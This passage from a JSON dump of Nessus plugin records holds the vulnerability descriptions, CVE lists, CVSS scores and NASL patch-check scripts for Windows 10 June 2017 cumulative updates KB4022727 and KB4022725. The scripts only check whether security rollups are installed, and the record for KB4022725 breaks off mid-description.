hotfix_get_systemdrive(exit_on_fail:TRUE, as_share:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:make_list(4022714)))\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows 10 version 1507 host is missing security update\nKB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. 
An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0218,\n CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. 
(CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. 
An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. 
(CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists in DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. 
(CVE-2017-8554)", "edition": 42, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-06-13T00:00:00", "title": "KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8531", "CVE-2017-8481", "CVE-2017-0218", "CVE-2017-8491", "CVE-2017-8478", "CVE-2017-8533", "CVE-2017-8462", "CVE-2017-8485", "CVE-2017-8530", "CVE-2017-8482", "CVE-2017-8549", "CVE-2017-0288", "CVE-2017-8464", "CVE-2017-8483", "CVE-2017-0297", "CVE-2017-8522", "CVE-2017-8492", "CVE-2017-8543", "CVE-2017-0291", "CVE-2017-8465", "CVE-2017-8490", "CVE-2017-8471", "CVE-2017-8474", "CVE-2017-8480", "CVE-2017-0283", "CVE-2017-8460", "CVE-2017-0294", "CVE-2017-0292", "CVE-2017-8468", "CVE-2017-8489", "CVE-2017-8517", "CVE-2017-8477", "CVE-2017-8479", "CVE-2017-8532", "CVE-2017-8523", "CVE-2017-8524", "CVE-2017-0193", "CVE-2017-8575", "CVE-2017-0300", "CVE-2017-8494", "CVE-2017-8548", "CVE-2017-0287", "CVE-2017-8473", "CVE-2017-0285", "CVE-2017-8470", "CVE-2017-8547", "CVE-2017-8579", "CVE-2017-0284", "CVE-2017-8518", "CVE-2017-8544", "CVE-2017-0298", "CVE-2017-0299", "CVE-2017-0219", "CVE-2017-0282", "CVE-2017-8475", "CVE-2017-8466", "CVE-2017-8476", "CVE-2017-0289", "CVE-2017-8484", "CVE-2017-8554", "CVE-2017-8493", "CVE-2017-8576", "CVE-2017-8527", "CVE-2017-0296"], "modified": "2017-06-13T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS17_JUN_4022727.NASL", "href": "https://www.tenable.com/plugins/nessus/100765", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100765);\n script_version(\"1.25\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/08/18\");\n\n script_cve_id(\n \"CVE-2017-0193\",\n \"CVE-2017-0218\",\n \"CVE-2017-0219\",\n \"CVE-2017-0282\",\n \"CVE-2017-0283\",\n \"CVE-2017-0284\",\n \"CVE-2017-0285\",\n \"CVE-2017-0287\",\n 
\"CVE-2017-0288\",\n \"CVE-2017-0289\",\n \"CVE-2017-0291\",\n \"CVE-2017-0292\",\n \"CVE-2017-0294\",\n \"CVE-2017-0296\",\n \"CVE-2017-0297\",\n \"CVE-2017-0298\",\n \"CVE-2017-0299\",\n \"CVE-2017-0300\",\n \"CVE-2017-8460\",\n \"CVE-2017-8462\",\n \"CVE-2017-8464\",\n \"CVE-2017-8465\",\n \"CVE-2017-8466\",\n \"CVE-2017-8468\",\n \"CVE-2017-8470\",\n \"CVE-2017-8471\",\n \"CVE-2017-8473\",\n \"CVE-2017-8474\",\n \"CVE-2017-8475\",\n \"CVE-2017-8476\",\n \"CVE-2017-8477\",\n \"CVE-2017-8478\",\n \"CVE-2017-8479\",\n \"CVE-2017-8480\",\n \"CVE-2017-8481\",\n \"CVE-2017-8482\",\n \"CVE-2017-8483\",\n \"CVE-2017-8484\",\n \"CVE-2017-8485\",\n \"CVE-2017-8489\",\n \"CVE-2017-8490\",\n \"CVE-2017-8491\",\n \"CVE-2017-8492\",\n \"CVE-2017-8493\",\n \"CVE-2017-8494\",\n \"CVE-2017-8517\",\n \"CVE-2017-8518\",\n \"CVE-2017-8522\",\n \"CVE-2017-8523\",\n \"CVE-2017-8524\",\n \"CVE-2017-8527\",\n \"CVE-2017-8530\",\n \"CVE-2017-8531\",\n \"CVE-2017-8532\",\n \"CVE-2017-8533\",\n \"CVE-2017-8543\",\n \"CVE-2017-8544\",\n \"CVE-2017-8547\",\n \"CVE-2017-8548\",\n \"CVE-2017-8549\",\n \"CVE-2017-8554\",\n \"CVE-2017-8575\",\n \"CVE-2017-8576\",\n \"CVE-2017-8579\"\n );\n script_bugtraq_id(\n 98818,\n 98819,\n 98820,\n 98821,\n 98824,\n 98826,\n 98835,\n 98836,\n 98837,\n 98839,\n 98840,\n 98843,\n 98844,\n 98845,\n 98846,\n 98847,\n 98848,\n 98849,\n 98850,\n 98852,\n 98853,\n 98854,\n 98855,\n 98856,\n 98857,\n 98858,\n 98859,\n 98860,\n 98862,\n 98863,\n 98865,\n 98867,\n 98869,\n 98870,\n 98878,\n 98884,\n 98885,\n 98887,\n 98895,\n 98897,\n 98898,\n 98900,\n 98901,\n 98902,\n 98903,\n 98914,\n 98918,\n 98920,\n 98922,\n 98923,\n 98926,\n 98928,\n 98929,\n 98930,\n 98932,\n 98933,\n 98942,\n 98954,\n 98955,\n 99210,\n 99212,\n 99215\n );\n script_xref(name:\"MSKB\", value:\"4022727\");\n script_xref(name:\"MSFT\", value:\"MS17-4022727\");\n\n script_name(english:\"KB4022727: Windows 10 Version 1507 June 2017 Cumulative Update\");\n script_summary(english:\"Checks for 
rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1507 host is missing security update\nKB4022727. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V instruction emulation due to a failure\n to properly enforce privilege levels. An attacker on a\n guest operating system can exploit this to gain elevated\n privileges on the guest. Note that the host operating\n system is not vulnerable. (CVE-2017-0193)\n\n - Multiple security bypass vulnerabilities exist in\n Device Guard. A local attacker can exploit these, via a\n specially crafted script, to bypass the Device Guard\n Code Integrity policy and inject arbitrary code into a\n trusted PowerShell process. (CVE-2017-0218,\n CVE-2017-0219)\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0284, CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to execute arbitrary code in the context of\n the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. 
An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. (CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. 
An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - Multiple elevation of privilege vulnerabilities exist in\n the Windows kernel-mode driver due to improper handling\n of objects in memory. A local attacker can exploit\n these, via a specially crafted application, to run\n processes in an elevated context. (CVE-2017-8465,\n CVE-2017-8466, CVE-2017-8468)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8473, CVE-2017-8474,\n CVE-2017-8475, CVE-2017-8476, CVE-2017-8477,\n CVE-2017-8478, CVE-2017-8479, CVE-2017-8480,\n CVE-2017-8481, CVE-2017-8482, CVE-2017-8483,\n CVE-2017-8484, CVE-2017-8489, CVE-2017-8490,\n CVE-2017-8491, CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An elevation of privilege vulnerability exists in the\n Windows Secure Kernel Mode feature due to a failure to\n properly handle objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n bypass virtual trust levels (VTL). (CVE-2017-8494)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit these, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8517, CVE-2017-8522, CVE-2017-8524,\n CVE-2017-8548)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly apply the\n Same Origin Policy for HTML elements. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to follow a link, to load a page with\n malicious content. (CVE-2017-8523)\n\n - A remote code execution vulnerability exists in the\n Windows font library due to improper handling of\n embedded fonts. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website or open a specially crafted Microsoft\n document, to execute arbitrary code in the context of\n the current user. 
(CVE-2017-8527)\n\n - A same-origin policy bypass vulnerability exists in\n Microsoft Edge due to a failure to properly enforce\n same-origin policies. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose information\n from origins outside the current one. (CVE-2017-8530)\n\n - A remote code execution vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to execute arbitrary code. (CVE-2017-8543)\n\n - An information disclosure vulnerability exists in the\n Windows Search functionality due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, via a specially crafted SMB message,\n to disclose sensitive information. (CVE-2017-8544)\n\n - A remote code execution vulnerability exists in Internet\n Explorer due to improper handling of objects in memory.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8547)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8549)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics component due to improper handling of\n objects in memory. An authenticated, remote attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8575)\n\n - An elevation of privilege vulnerability exists in the\n Windows Graphics component due to improper\n initialization of objects in memory. A local attacker\n can exploit this, via a specially crafted application,\n to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An elevation of privilege vulnerability exists DirectX\n due to improper handling of objects in memory. A local\n attacker can exploit this, via a specially crafted\n application, to execute arbitrary code in kernel mode.\n (CVE-2017-8576)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. An authenticated, remote attacker can exploit\n this, via a specially crafted application, to disclose\n the contents of memory. (CVE-2017-8554)\");\n\n # https://support.microsoft.com/en-us/help/4022727/windows-10-update-kb4022727\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?05d092f6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4022727 as well as refer to the KB article for additional information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-8543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LNK Code Execution Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", 
value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/06/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-06';\nkbs = make_list(\n '4022727' # 10 1507\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"06_2017\",\n bulletin:bulletin,\n rollup_kb_list:kbs)\n )\n{\n 
replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T18:30:55", "description": "The remote Windows 10 version 1703 host is missing security update\nKB4022725. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple information disclosure vulnerabilities exist in\n Windows Uniscribe due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n these, by convincing a user to visit a specially crafted\n website or to open a specially crafted document, to\n disclose the contents of memory. (CVE-2017-0282,\n CVE-2017-0285)\n\n - A remote code execution vulnerability exists in\n Windows Uniscribe software due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website or to open a specially crafted\n document, to execute arbitrary code in the context\n of the current user. (CVE-2017-0283)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows GDI component due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit these, by convincing a user to visit a\n specially crafted website or open a specially crafted\n document, to disclose the contents of memory.\n (CVE-2017-0287, CVE-2017-0288, CVE-2017-0289,\n CVE-2017-8531, CVE-2017-8532, CVE-2017-8533)\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit these,\n by convincing a user to open a specially crafted PDF\n file, to execute arbitrary code in the context of the\n current user. 
(CVE-2017-0291, CVE-2017-0292)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows due to improper handling of cabinet\n files. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n cabinet file, to execute arbitrary code in the context\n of the current user. (CVE-2017-0294)\n\n - A flaw exists in Microsoft Windows due to incorrect\n permissions being set on folders inside the DEFAULT\n folder structure. An authenticated, remote attacker can\n exploit this, by logging in to the affected system\n before the user can log in, to modify the user's DEFAULT\n folder contents. (CVE-2017-0295)\n\n - An elevation of privilege vulnerability exists in\n tdx.sys due to a failure to check the length of a buffer\n prior to copying memory to it. A local attacker can\n exploit this, via a specially crafted application, to\n execute arbitrary code in an elevated context.\n (CVE-2017-0296)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. (CVE-2017-0297)\n\n - An elevation of privilege vulnerability exists in the\n DCOM object in Helppane.exe, when configured to run as\n the interactive user, due to a failure to properly\n authenticate the client. An authenticated, remote\n attacker can exploit this, via a specially crafted\n application, to run arbitrary code in another user's\n session after that user has logged on to the same system\n using Terminal Services or Fast User Switching.\n (CVE-2017-0298)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. 
An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose the base address of the kernel driver.\n (CVE-2017-0299, CVE-2017-0300, CVE-2017-8462,\n CVE-2017-8485)\n\n - An information disclosure vulnerability exists in\n Microsoft Windows due to improper parsing of PDF files.\n An unauthenticated, remote attacker can exploit this, by\n convincing a user to open a specially crafted PDF file,\n to disclose the contents of memory. (CVE-2017-8460)\n\n - A remote code execution vulnerability exists in Windows\n due to improper handling of shortcuts. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to insert a removable drive containing\n a malicious shortcut and binary, to automatically\n execute arbitrary code in the context of the current\n user. (CVE-2017-8464)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run processes in\n an elevated context. (CVE-2017-8465)\n\n - Multiple information disclosure vulnerabilities exist in\n the Windows kernel due to improper initialization of\n objects in memory. An authenticated, remote attacker can\n exploit these, via a specially crafted application, to\n disclose sensitive information. 
(CVE-2017-8470,\n CVE-2017-8471, CVE-2017-8474, CVE-2017-8475,\n CVE-2017-8476, CVE-2017-8477, CVE-2017-8478,\n CVE-2017-8479, CVE-2017-8480, CVE-2017-8481,\n CVE-2017-8482, CVE-2017-8483, CVE-2017-8484,\n CVE-2017-8489, CVE-2017-8490, CVE-2017-8491,\n CVE-2017-8492)\n\n - A security bypass vulnerability exists due to a failure\n to enforce case sensitivity for certain variable checks.\n A local attacker can exploit this, via a specially\n crafted application, to bypass Unified Extensible\n Firmware Interface (UEFI) variable security.\n (CVE-2017-8493)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge due to improper handling of JavaScript\n XML DOM objects. An unauthenticated, remote attacker can\n exploit this, by convincing a user to visit a specially\n crafted website, to disclose sensitive information.\n (CVE-2017-8498)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the JavaScript scripting engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-8499)\n\n - An information disclosure vulnerability exists in\n Microsoft Edge in the Fetch API due to improper handling\n of filtered response types. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to disclose sensitive\n information in the URL of a cross-origin request.\n (CVE-2017-8504)\n\n - A denial of service vulnerability exists in Windows due\n to improper handling of kernel mode requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted kernel mode request, to cause the\n machine to stop responding or rebooting. 
